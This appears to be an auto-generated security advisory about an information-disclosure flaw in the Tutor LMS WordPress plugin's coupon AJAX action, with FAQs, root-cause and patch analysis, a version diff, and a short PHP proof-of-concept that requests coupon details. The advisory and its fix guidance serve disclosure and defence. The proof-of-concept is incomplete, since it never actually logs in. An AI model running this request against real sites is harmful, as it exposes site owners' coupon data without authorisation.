What is CVE-2026-1371?

CVE-2026-1371 is a medium severity vulnerability affecting the Tutor LMS WordPress plugin, specifically versions up to and including 3.9.5. It allows authenticated users with Subscriber-level access or higher to access sensitive coupon information due to missing authorization checks in the AJAX action ‘tutor_coupon_details’.

How does the vulnerability work?

The vulnerability arises from the ‘ajax_coupon_details()’ function, which only checks nonces without verifying user capabilities. This means that any authenticated user can send a request to retrieve sensitive coupon details, including codes and discount amounts, without appropriate permissions.

Who is affected by this vulnerability?

Any WordPress site using the Tutor LMS plugin version 3.9.5 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to access sensitive information.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Tutor LMS plugin you are using. If it is version 3.9.5 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users who may exploit this vulnerability.

What steps should I take to fix this vulnerability?

To fix this vulnerability, update the Tutor LMS plugin to version 3.9.6 or later, where the issue has been addressed. Regularly check for updates to ensure your plugins are secure and up-to-date.

What does the CVSS score of 5.3 mean?

The CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.

What information can attackers access through this vulnerability?

Attackers exploiting this vulnerability can access sensitive coupon information, including coupon codes, discount amounts, usage statistics, and the courses or bundles to which the coupons apply. This information could be misused for financial gain or competitive intelligence.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint with a valid nonce and coupon ID. This request retrieves sensitive coupon details, illustrating the ease of exploitation.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to sensitive business information, potential financial abuse through coupon misuse, and the ability for attackers to gather intelligence on discount strategies. While attackers cannot modify or delete coupons, the exposed data can be damaging.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, implement regular security audits of your plugins, ensure proper capability checks in custom code, and keep all software updated. Additionally, consider using security plugins that monitor for vulnerabilities and provide alerts.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider restricting access to the affected AJAX action for lower-level users or disabling the coupon functionality until the plugin can be updated. Review user roles and permissions to minimize exposure.

Where can I find more information about this vulnerability?

More information about CVE-2026-1371 can be found in the official CVE database, security advisories from the plugin developers, and security analysis reports from reputable cybersecurity firms. Staying informed through these resources can help you manage vulnerabilities effectively.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1371: Tutor LMS <= 3.9.5 – Authenticated (Subscriber+) Information Disclosure in Coupon Details via 'tutor_coupon_details' AJAX Action (tutor)

CVE ID CVE-2026-1371

Plugin tutor

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 3.9.5

Patched Version 3.9.6

Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1371:
The vulnerability is an authenticated information disclosure flaw in the Tutor LMS WordPress plugin, affecting versions up to and including 3.9.5. The issue resides in the coupon details AJAX endpoint, which lacks proper capability checks. This allows authenticated users with Subscriber-level permissions or higher to access sensitive coupon information, including codes, discount amounts, usage statistics, and associated course/bundle data.

Root Cause:
The vulnerability originates in the `ajax_coupon_details()` function within the `CouponController.php` file. The function validates nonces via `tutor_utils()->checking_nonce()` but does not verify user capabilities before processing the request. The function retrieves coupon details using `Input::post(‘id’)` and returns them via `$this->json_response()` without any authorization check. The missing capability check permits any authenticated user, regardless of role, to access coupon data that should be restricted to administrators or instructors.

Exploitation:
An attacker with Subscriber-level access or higher can send a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `tutor_coupon_details`. The request must include a valid nonce (obtainable via other plugin functionality) and the coupon ID parameter. The payload structure is: `action=tutor_coupon_details&id={coupon_id}&_ajax_nonce={valid_nonce}`. The server responds with JSON containing the coupon’s sensitive details, including the coupon code, discount amount, usage limits, and associated course IDs.

Patch Analysis:
The patch adds a single line of code at line 662 in `tutor/ecommerce/CouponController.php`: `tutor_utils()->check_current_user_capability();`. This function call validates that the current user possesses the necessary capabilities to perform the action. Before the patch, the function only checked nonce validity. After the patch, the function verifies both nonce and user capabilities, preventing unauthorized access. The patch ensures that only users with appropriate permissions (typically administrators or users with `manage_tutor` capability) can retrieve coupon details.

Impact:
Successful exploitation allows authenticated attackers to obtain sensitive coupon information. This includes active coupon codes, discount percentages or amounts, usage limits, expiration dates, and the specific courses or bundles where coupons apply. Attackers could use this information to abuse coupon systems, perform coupon enumeration, or gather business intelligence about discount strategies. The vulnerability does not permit modification or deletion of coupons, but the exposed data could facilitate financial abuse or competitive intelligence gathering.

Differential between vulnerable and patched code

Code Diff

--- a/tutor/classes/Course.php
+++ b/tutor/classes/Course.php
@@ -1174,6 +1174,19 @@
 			delete_post_meta( $course_id, '_elementor_edit_mode' );
 		} elseif ( 'droip' === $builder ) {
 			delete_post_meta( $course_id, 'droip_editor_mode' );
+		} elseif ( 'divi' === $builder ) {
+			$old_post_content     = get_post_meta( $course_id, '_et_pb_old_content', true );
+			$course               = get_post( $course_id );
+			$course->post_content = $old_post_content;
+			$result               = wp_update_post( $course );
+
+			if ( $result && ! is_wp_error( $result ) ) {
+				update_post_meta( $course_id, '_et_pb_use_builder', 'off' );
+				update_post_meta( $course_id, '_et_pb_old_content', '' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_shortcodes' );
+				delete_post_meta( $course_id, '_et_dynamic_cached_attributes' );
+				delete_post_meta( $course_id, '_et_builder_module_features_cache' );
+			}
 		}

 		$this->json_response(
--- a/tutor/classes/Course_List.php
+++ b/tutor/classes/Course_List.php
@@ -273,7 +273,6 @@
 		$the_query = self::course_list_query( $args, $user_id, $status );

 		return ! is_null( $the_query ) && isset( $the_query->found_posts ) ? $the_query->found_posts : $the_query;
-
 	}

 	/**
@@ -291,6 +290,8 @@

 		// Check if user is privileged.
 		if ( ! current_user_can( 'administrator' ) ) {
+			$course_ids = explode( ',', $bulk_ids );
+
 			if ( current_user_can( 'edit_tutor_course' ) ) {
 				$can_publish_course = tutor_utils()->get_option( 'instructor_can_publish_course' );

@@ -300,6 +301,17 @@
 			} else {
 				wp_send_json_error( tutor_utils()->error_message() );
 			}
+
+			// Check if the course ids are instructors own course.
+			$course_ids = array_filter(
+				$course_ids,
+				function ( $course_id ) {
+					return tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id );
+				}
+			);
+
+			$bulk_ids = implode( ',', $course_ids );
+
 		}

 		if ( '' === $action || '' === $bulk_ids ) {
--- a/tutor/classes/User.php
+++ b/tutor/classes/User.php
@@ -375,10 +375,11 @@
 		$_tutor_profile_bio       = Input::post( self::PROFILE_BIO_META, '', Input::TYPE_KSES_POST );
 		$_tutor_profile_image     = Input::post( self::PROFILE_PHOTO_META, '', Input::TYPE_KSES_POST );

+		// Check if the image uploaded is by the same user.
 		if ( is_numeric( $_tutor_profile_image ) ) {
 			$attachment = get_post( $_tutor_profile_image );
-
-			if ( 'attachment' === $attachment->post_type && $user_id !== $attachment->post_author ) {
+			$author_id  = (int) $attachment->post_author ?? 0;
+			if ( 'attachment' === $attachment->post_type && $user_id !== $author_id ) {
 				return;
 			}
 		}
--- a/tutor/ecommerce/CouponController.php
+++ b/tutor/ecommerce/CouponController.php
@@ -659,6 +659,8 @@
 			$this->json_response( tutor_utils()->error_message( 'nonce' ), null, HttpHelper::STATUS_BAD_REQUEST );
 		}

+		tutor_utils()->check_current_user_capability();
+
 		$coupon_id = Input::post( 'id' );

 		if ( empty( $coupon_id ) ) {
--- a/tutor/ecommerce/currency.php
+++ b/tutor/ecommerce/currency.php
@@ -856,6 +856,13 @@
 				'numeric_code' => 643,
 			),
 			array(
+				'code'         => 'RWF',
+				'symbol'       => 'FRw',
+				'name'         => 'Rwandan Franc',
+				'locale'       => 'rw-rw',
+				'numeric_code' => 646,
+			),
+			array(
 				'code'         => 'SAR',
 				'symbol'       => 'SAR',
 				'name'         => 'Saudi Riyal',
--- a/tutor/includes/droip/backend/Ajax.php
+++ b/tutor/includes/droip/backend/Ajax.php
@@ -73,6 +73,13 @@
 		if ( 'add_to_cart_course' === $request_method ) {
 			$course_id = Input::post( 'course_id' );
 			$res       = tutor_add_to_cart( $course_id );
+
+			// check is user logged in or not
+			if (! is_user_logged_in() ) {
+				$res['redirect'] = true;
+				$res['data'] = wp_login_url( wp_get_referer() );
+			}
+
 			wp_send_json_success( $res );
 		}

--- a/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
+++ b/tutor/includes/droip/backend/ElementGenerator/ActionsGenerator.php
@@ -231,13 +231,13 @@
 			case 'membership_btn': {
 					$pricing_page = Settings::get_pricing_page_url();
 					if ($pricing_page) {
-						if (is_user_logged_in()) {
-							$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
-						} else {
-							$login_url = wp_login_url(wp_get_referer());
+						$extra_attributes .= " data-pricing_url='" . $pricing_page . "'";
+						// if (is_user_logged_in()) { // removed to always direct to pricing page
+						// } else {
+						// 	$login_url = wp_login_url(wp_get_referer());

-							$extra_attributes .= " data-login_url='" . $login_url . "'";
-						}
+						// 	$extra_attributes .= " data-login_url='" . $login_url . "'";
+						// }

 						return $this->generate_child_element_with_parent_droip_data($extra_attributes);
 					}
--- a/tutor/includes/droip/backend/Hooks.php
+++ b/tutor/includes/droip/backend/Hooks.php
@@ -47,6 +47,105 @@
         add_filter('droip_external_collection_options', [$this, 'modify_external_collection_options'], 10, 2);
         add_filter('droip_external_collection_item_type', [$this, 'get_tutor_item_types'], 10, 2);
         add_filter('droip_element_generator_radio-button', [$this, 'droip_element_generator_radio_buttons'], 10, 2);
+
+        add_filter('droip_import_should_create_page', [$this, 'droip_import_should_create_page'], 10, 2);
+        add_action('droip_import_page_created', [$this, 'droip_import_page_created'], 10, 2);
+
+        // $show = apply_filters('droip_show_custom_section_' . $type, true);
+        add_filter('droip_show_custom_section_header', [$this, 'show_droip_header'], 10, 1);
+        add_filter('droip_show_custom_section_footer', [$this, 'show_droip_footer'], 10, 1);
+    }
+
+    public function show_droip_header($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    public function show_droip_footer($show)
+    {
+        $is_frontend_builder = tutor_utils()->is_tutor_frontend_dashboard( 'create-course' );
+        if ( $is_frontend_builder ) {
+            $show = false;
+        }
+        if( $this->if_spotlight_mode_for_learning_page_enabled() ) {
+            $show = false;
+        }
+        return $show;
+    }
+
+    private function if_spotlight_mode_for_learning_page_enabled(){
+        global $wp_query;
+        if($wp_query->is_single && ! empty( $wp_query->query_vars['post_type'] ) &&  in_array( $wp_query->query_vars['post_type'], ['lesson', 'tutor_quiz', 'tutor_assignments', 'tutor-google-meet', 'tutor_zoom_meeting'])  ) {
+            $enable_spotlight_mode = tutor_utils()->get_option( 'enable_spotlight_mode' );
+            if ( $enable_spotlight_mode ) {
+                return true;
+            }
+        }
+
+        return false;
+    }
+
+    public function droip_import_should_create_page($flag, $old_page_data)
+    {
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if(in_array($page_slug, ['instructor-registration', 'student-registration'])){
+                return false;
+            }
+            if($page_slug === 'cart' && get_post(CartController::get_page_id())){
+                return false;
+            }
+            if($page_slug === 'checkout' && get_post(CheckoutController::get_page_id())){
+                return false;
+            }
+
+            $dashboard_page_id = (int) tutor_utils()->dashboard_page_id();
+            if($page_slug === 'dashboard' && get_post($dashboard_page_id)){
+                return false;
+            }
+
+            $certificate_page_id = (int) tutor_utils()->get_option('tutor_certificate_page');
+            if($page_slug === 'tutor-certificate' && get_post($certificate_page_id)){
+                return false;
+            }
+
+            $membership_page_id = (int) tutor_utils()->get_option('membership_pricing_page_id');
+            if($page_slug === 'membership-pricing' && get_post($membership_page_id)){
+                return false;
+            }
+        }
+
+        return $flag;
+    }
+
+    public function droip_import_page_created($new_page_id, $old_page_data)
+    {
+        // Clear Tutor LMS Cache after importing a page
+        if ($old_page_data['post_type'] === 'page') {
+            $page_slug = $old_page_data['post_name'];
+            if($page_slug === 'cart'){
+                tutor_utils()->update_option( CartController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'checkout'){
+                tutor_utils()->update_option( CheckoutController::PAGE_ID_OPTION_NAME, $new_page_id );
+            }
+            if($page_slug === 'dashboard'){
+                tutor_utils()->update_option( 'tutor_dashboard_page_id', $new_page_id );
+            }
+            if($page_slug === 'tutor-certificate'){
+                tutor_utils()->update_option( 'tutor_certificate_page', $new_page_id );
+            }
+            if($page_slug === 'membership-pricing'){
+                tutor_utils()->update_option( 'membership_pricing_page_id', $new_page_id );
+            }
+        }
     }

     public function modify_droip_dynamic_content_fields($fields, $collection_data)
@@ -646,13 +745,15 @@
                     $plan_id = false;
                     $url = '#';

-                    if (isset($args['options'], $args['options']['membership-plan'])) {
+                    if (is_user_logged_in() && isset($args['options'], $args['options']['membership-plan'])) {
                         $plan_id = $args['options']['membership-plan']->id;
                         $checkout_link = CheckoutController::get_page_url();

                         if ($checkout_link) {
                             $url = add_query_arg('plan', $plan_id, $checkout_link);
                         }
+                    } else if (!is_user_logged_in()) {
+                        $url = wp_login_url(wp_get_referer());
                     }

                     return $url;
--- a/tutor/includes/droip/backend/VisibilityCondition.php
+++ b/tutor/includes/droip/backend/VisibilityCondition.php
@@ -34,11 +34,11 @@
 			switch ($type) {
 				case 'courses': {
 						$conditions = self::get_course_type_conditions($conditions);
+						$conditions = self::get_lms_setting_type_conditions($conditions);
 						break;
 					}
 			}

-			$conditions = self::get_lms_setting_type_conditions($conditions);
 		} elseif ($collectionType === 'user') {
 			switch ($type) {
 				case 'courses': {
@@ -621,7 +621,123 @@
 						'value'         => 'is_membership_only_mode_enabled',
 						'title'         => 'Membership-Only Mode',
 						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_spotlight_mode',
+						'title' => 'Spotlight Mode Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'display_course_instructors',
+						'title' => 'Instructor Info Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_wishlist',
+						'title' => 'Wishlist Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'     => 'enable_q_and_a_on_course',
+						'title' => 'Q&A Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_author',
+						'title' => 'Author Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_level',
+						'title' => 'Level Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_share',
+						'title' => 'Social Share Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_duration',
+						'title' => 'Duration Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_total_enrolled',
+						'title' => 'Total Enrolled Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_update_date',
+						'title' => 'Update Date Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_progress_bar',
+						'title' => 'Progress Bar Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_material',
+						'title' => 'Show Material Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_about',
+						'title' => 'About Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_description',
+						'title' => 'Description Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_benefits',
+						'title' => 'Course Benefits Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_requirements',
+						'title' => 'Requirements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_target_audience',
+						'title' => 'Target Audience Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_announcements',
+						'title' => 'Announcements Enabled',
+						'operator_type' => 'boolean_operators',
+					),
+					array(
+						'source'        => TDE_APP_PREFIX,
+						'value'         => 'enable_course_review',
+						'title' => 'Review Enabled',
+						'operator_type' => 'boolean_operators',
 					)
+
 				)
 			),
 		);
@@ -839,14 +955,36 @@
 	{
 		switch ($field) {
 			case 'is_membership_only_mode_enabled': {
-					$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
-					return $is_membership_only_mode_enabled;
-				}
+				$is_membership_only_mode_enabled = apply_filters('tutor_membership_only_mode', false);
+				return $is_membership_only_mode_enabled;
+			}
+
+			case 'enable_spotlight_mode':
+			case 'display_course_instructors':
+			case 'enable_wishlist':
+			case 'enable_q_and_a_on_course':
+			case 'enable_course_author':
+			case 'enable_course_level':
+			case 'enable_course_share':
+			case 'enable_course_duration':
+			case 'enable_course_total_enrolled':
+			case 'enable_course_update_date':
+			case 'enable_course_progress_bar':
+			case 'enable_course_material':
+			case 'enable_course_about':
+			case 'enable_course_description':
+			case 'enable_course_benefits':
+			case 'enable_course_requirements':
+			case 'enable_course_target_audience':
+			case 'enable_course_announcements':
+			case 'enable_course_review': {
+				$is_enabled = tutor_utils()->get_option($field, false);
+				return $is_enabled;
+			}

 			default: {
-					return null;
-				}
+				return false;
+			}
 		}
-		return null;
 	}
 }
 No newline at end of file
--- a/tutor/tutor.php
+++ b/tutor/tutor.php
@@ -4,11 +4,11 @@
  * Plugin URI: https://tutorlms.com
  * Description: Tutor is a complete solution for creating a Learning Management System in WordPress way. It can help you to create small to large scale online education site very conveniently. Power features like report, certificate, course preview, private file sharing make Tutor a robust plugin for any educational institutes.
  * Author: Themeum
- * Version: 3.9.5
+ * Version: 3.9.6
  * Author URI: https://themeum.com
  * Requires PHP: 7.4
  * Requires at least: 5.3
- * Tested up to: 6.8
+ * Tested up to: 6.9
  * License: GPLv2 or later
  * Text Domain: tutor
  *
@@ -26,7 +26,7 @@
  *
  * @since 1.0.0
  */
-define( 'TUTOR_VERSION', '3.9.5' );
+define( 'TUTOR_VERSION', '3.9.6' );
 define( 'TUTOR_FILE', __FILE__ );

 /**
--- a/tutor/vendor/composer/installed.php
+++ b/tutor/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'themeum/tutor',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+        'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'themeum/tutor' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
+            'reference' => '11d7e23fa5b4dbc33a21b43c6a3458484fd24999',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1371 - Tutor LMS <= 3.9.5 - Authenticated (Subscriber+) Information Disclosure in Coupon Details via 'tutor_coupon_details' AJAX Action

<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
$coupon_id = 123; // Target coupon ID

// Step 1: Authenticate and obtain cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');

// Step 2: Get a valid nonce from Tutor LMS frontend
// Nonces are typically available in page HTML or via other AJAX endpoints
// This example assumes we've extracted a nonce value
$nonce = 'abc123def456';

// Step 3: Construct and send the exploit request
$post_fields = [
    'action' => 'tutor_coupon_details',
    'id' => $coupon_id,
    '_ajax_nonce' => $nonce
];

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Step 4: Parse and display results
if ($http_code === 200) {
    $data = json_decode($response, true);
    if (isset($data['success']) && $data['success'] === true) {
        echo "[+] Vulnerability exploited successfully!n";
        echo "[+] Coupon Details:n";
        print_r($data['data']);
    } else {
        echo "[-] Request failed. Response:n";
        print_r($data);
    }
} else {
    echo "[-] HTTP Error: $http_coden";
    echo "Response: $responsen";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-1371?
Overview of the vulnerability
CVE-2026-1371 is a medium severity vulnerability affecting the Tutor LMS WordPress plugin, specifically versions up to and including 3.9.5. It allows authenticated users with Subscriber-level access or higher to access sensitive coupon information due to missing authorization checks in the AJAX action ‘tutor_coupon_details’.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the ‘ajax_coupon_details()’ function, which only checks nonces without verifying user capabilities. This means that any authenticated user can send a request to retrieve sensitive coupon details, including codes and discount amounts, without appropriate permissions.
Who is affected by this vulnerability?
Identifying vulnerable users and systems
Any WordPress site using the Tutor LMS plugin version 3.9.5 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to access sensitive information.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check if your site is vulnerable, verify the version of the Tutor LMS plugin you are using. If it is version 3.9.5 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users who may exploit this vulnerability.
What steps should I take to fix this vulnerability?
Mitigation and patching
To fix this vulnerability, update the Tutor LMS plugin to version 3.9.6 or later, where the issue has been addressed. Regularly check for updates to ensure your plugins are secure and up-to-date.
What does the CVSS score of 5.3 mean?
Understanding the severity rating
The CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk to affected systems. Administrators should prioritize addressing this vulnerability to prevent potential exploitation.
What information can attackers access through this vulnerability?
Details of exposed data
Attackers exploiting this vulnerability can access sensitive coupon information, including coupon codes, discount amounts, usage statistics, and the courses or bundles to which the coupons apply. This information could be misused for financial gain or competitive intelligence.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint with a valid nonce and coupon ID. This request retrieves sensitive coupon details, illustrating the ease of exploitation.
What are the practical risks of this vulnerability?
Real-world implications
The practical risks include unauthorized access to sensitive business information, potential financial abuse through coupon misuse, and the ability for attackers to gather intelligence on discount strategies. While attackers cannot modify or delete coupons, the exposed data can be damaging.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, implement regular security audits of your plugins, ensure proper capability checks in custom code, and keep all software updated. Additionally, consider using security plugins that monitor for vulnerabilities and provide alerts.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider restricting access to the affected AJAX action for lower-level users or disabling the coupon functionality until the plugin can be updated. Review user roles and permissions to minimize exposure.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-1371 can be found in the official CVE database, security advisories from the plugin developers, and security analysis reports from reputable cybersecurity firms. Staying informed through these resources can help you manage vulnerabilities effectively.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations